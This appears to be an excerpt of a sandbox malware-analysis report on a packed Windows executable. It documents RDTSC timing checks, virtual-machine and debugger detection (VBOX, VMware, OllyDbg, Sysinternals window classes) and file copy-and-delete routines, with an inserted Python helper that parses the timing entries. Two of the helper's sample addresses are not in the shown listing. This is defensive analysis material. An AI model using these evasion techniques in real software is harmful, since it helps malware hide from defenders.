Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DA0628 second address: DA062C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DA0791 second address: DA07A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F055C7C8326h 0x0000000a pop ecx 0x0000000b jmp 00007F055C7C832Bh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DA07A7 second address: DA07D7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F055D0637C4h 0x00000008 pop edx 0x00000009 pushad 0x0000000a jmp 00007F055D0637BAh 0x0000000f jmp 00007F055D0637BBh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DA07D7 second address: DA07DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DA07DD second address: DA0800 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F055D0637C2h 0x0000000f jne 00007F055D0637B6h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DA095A second address: DA095F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DA095F second address: DA0964 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DA0964 second address: DA0972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DA0972 second address: DA0988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F055D0637B6h 0x0000000a jmp 00007F055D0637BBh 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DA0988 second address: DA0998 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jbe 00007F055C7C8326h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DA0998 second address: DA099E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DA099E second address: DA09A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DA3C01 second address: DA3C06 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DA4E48 second address: DA4E79 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F055C7C832Eh 0x00000008 jp 00007F055C7C832Ch 0x0000000e jne 00007F055C7C8326h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 jno 00007F055C7C832Eh 0x0000001d push eax 0x0000001e push edx 0x0000001f push ebx 0x00000020 pop ebx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DA6B7B second address: DA6B7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DA6B7F second address: DA6B85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DA6B85 second address: DA6B8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4B902A1 second address: 4B902BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055C7C8339h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4B902BE second address: 4B90305 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055D0637C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c mov dh, 00h 0x0000000e mov di, si 0x00000011 popad 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 jmp 00007F055D0637BCh 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F055D0637C7h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4B903C0 second address: 4B903E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 push edi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F055C7C8334h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4B903E3 second address: 4B903E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4B903E9 second address: 4B903FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F055C7C832Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4B903FA second address: 4B903FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4B903FE second address: 4B90414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov cx, 1F95h 0x00000012 movzx esi, bx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4B90414 second address: 4B90452 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055D0637BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F055D0637BDh 0x00000014 xor ch, FFFFFFD6h 0x00000017 jmp 00007F055D0637C1h 0x0000001c popfd 0x0000001d mov esi, 3C7FEA47h 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4B90452 second address: 4B90492 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F055C7C8333h 0x00000009 xor al, 0000000Eh 0x0000000c jmp 00007F055C7C8339h 0x00000011 popfd 0x00000012 mov edx, ecx 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pop ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4B90492 second address: 4B90496 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4B90496 second address: 4B9049C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CBFFFE second address: CC001C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F055D0637C9h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CC001C second address: CC0031 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e jno 00007F055C7C8326h 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CC0031 second address: CC0037 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
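Every interceptor entry above has the same shape: one `rdtsc`, a few bytes of stack-save/restore pairs and short jumps that change nothing, then a second `rdtsc`. That is the classic virtualization check behind the "Tries to detect virtualization through RDTSC time measurements" signature: the packed stub reads the timestamp counter twice back to back and treats a large delta (a hypervisor trapping RDTSC, or a debugger single-stepping) as a sandbox. The script below is an added example, not part of the report or of Joe Sandbox; it parses entries in the format shown above (four of them, copied from the listing, are embedded as sample input), separates filler from instructions that do real work, and groups the windows by address so the few that carry actual code (the `mov ebp, esp` prologue around 4B902BE, for instance) stand out from the pure timing checks. The region labels are this example's own heuristic, not something the report states.

```python
"""Triage helper for Joe Sandbox "RDTSC instruction interceptor" entries.

Added example, not part of the report or of Joe Sandbox: it parses the entries
listed above, extracts the two timestamp reads and the instructions between
them, and separates stack/jump filler from instructions that do real work.
"""
import re
from collections import Counter

# Sample input (constructed): four entries copied from the report above. The
# parser keys on "First address", so the path/signature separator does not matter.
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2D465 second address: D2D469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc",
    r"Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2EDFC second address: D2EE53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055C7C8331h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a ja 00007F055C7C832Eh 0x00000010 push esi 0x00000011 pop esi 0x00000012 jo 00007F055C7C8326h 0x00000018 jmp 00007F055C7C8339h 0x0000001d jmp 00007F055C7C832Ch 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F055C7C832Ah 0x00000029 push edi 0x0000002a pop edi 0x0000002b rdtsc",
    r"Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B902BE second address: 4B90305 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055D0637C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c mov dh, 00h 0x0000000e mov di, si 0x00000011 popad 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 jmp 00007F055D0637BCh 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F055D0637C7h 0x00000022 rdtsc",
    r"Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBFFFE second address: CC001C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F055D0637C9h 0x00000009 popad 0x0000000a rdtsc",
]

ENTRY_RE = re.compile(
    r"First address: ([0-9A-Fa-f]+) second address: ([0-9A-Fa-f]+) instructions: (.+)$"
)
# Each instruction in the dump is prefixed by its byte offset, e.g. "0x00000002 pop edx".
OFFSET_RE = re.compile(r"\s*0x[0-9A-Fa-f]{8}\s+")

# Filler the packed stub inserts between the two reads: stack save/restore
# pairs and (conditional) jumps. Anything else is treated as real work.
FILLER = {"push", "pop", "pushad", "popad", "pushfd", "popfd", "nop"}


def parse_entry(line):
    """Return {'first', 'second', 'instructions'} for one interceptor line, else None."""
    m = ENTRY_RE.search(line)
    if not m:
        return None
    instrs = [s.strip() for s in OFFSET_RE.split(m.group(3)) if s.strip()]
    return {"first": int(m.group(1), 16), "second": int(m.group(2), 16), "instructions": instrs}


def is_filler(instr):
    mnemonic = instr.split()[0]
    return mnemonic in FILLER or mnemonic.startswith("j")


def stack_delta(instrs):
    """Net dwords pushed by the window (pushad/popad move eight)."""
    delta = 0
    for instr in instrs:
        m = instr.split()[0]
        if m == "pushad":
            delta += 8
        elif m == "popad":
            delta -= 8
        elif m in ("push", "pushfd"):
            delta += 1
        elif m in ("pop", "popfd"):
            delta -= 1
    return delta


def region(addr):
    # Assumption for this report only: the 0xBxxxxx-0xDxxxxx addresses are
    # inside the mapped image; 0x4B9xxxx lies far above it, i.e. in memory
    # the sample allocated at run time.
    return "image" if addr < 0x1000000 else "allocated"


def classify(entry):
    """Describe the window between two consecutive rdtsc reads."""
    inner = entry["instructions"][1:-1]  # drop the bracketing rdtsc pair
    payload = [i for i in inner if not is_filler(i)]
    return {
        "first": entry["first"],
        "second": entry["second"],
        "span_bytes": entry["second"] - entry["first"],
        "inner_count": len(inner),
        "payload": payload,  # instructions that do something real
        "stack_delta": stack_delta(inner),
        "region": region(entry["first"]),
    }


def analyze(lines):
    """Summarize all interceptor lines: how many windows are pure timing checks."""
    results = [classify(e) for e in map(parse_entry, lines) if e]
    pure = [r for r in results if not r["payload"]]
    return {
        "pairs": len(results),
        "pure_timing": len(pure),  # rdtsc, filler only, rdtsc
        "with_payload": len(results) - len(pure),
        "regions": dict(Counter(r["region"] for r in results)),
        "max_span_bytes": max((r["span_bytes"] for r in results), default=0),
        "details": results,
    }


if __name__ == "__main__":
    summary = analyze(SAMPLE_LINES)
    for d in summary["details"]:
        print(f"{d['first']:08X}->{d['second']:08X} {d['region']:9s} "
              f"inner={d['inner_count']:2d} payload={d['payload'] or '-'}")
    print({k: v for k, v in summary.items() if k != "details"})
```

Feed it the whole listing instead of the four sample lines and the split is stark: the windows in the image range are filler-only timing probes, while the handful at 4B9xxxx interleave the check with the real prologue, which is where to set a breakpoint once the stub has unpacked. Because the interceptor reports only consecutive pairs, the stack delta of one window is often non-zero; the pushes that balance it sit in the neighbouring window.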
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: B0F9C1 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: CADD2A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: D398E1 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe | Evaded block: after key decision
Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetSystemTime,DecisionNodes
Source: C:\Users\user\Desktop\file.exe | API coverage: 4.5 %
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008DE330 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008D3CC0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008DCCE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008D1C40 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008C15A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008C15B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008D15C0 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008CDD70 lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008D4EC0 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008DD640 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008DDE50 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008D2730 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_008D2730
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008D2749 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_008D2749
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008E3190 GetSystemInfo,wsprintfA,0_2_008E3190
Source: file.exe, file.exe, 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1747032810.0000000000561000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1747032810.0000000000593000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1747032810.0000000000536000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

              Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008C4980 VirtualProtect 00000000,00000004,00000100,?
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008E63C0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008E63C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008E29E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

              HIPS / PFW / Operating System Protection Evasion

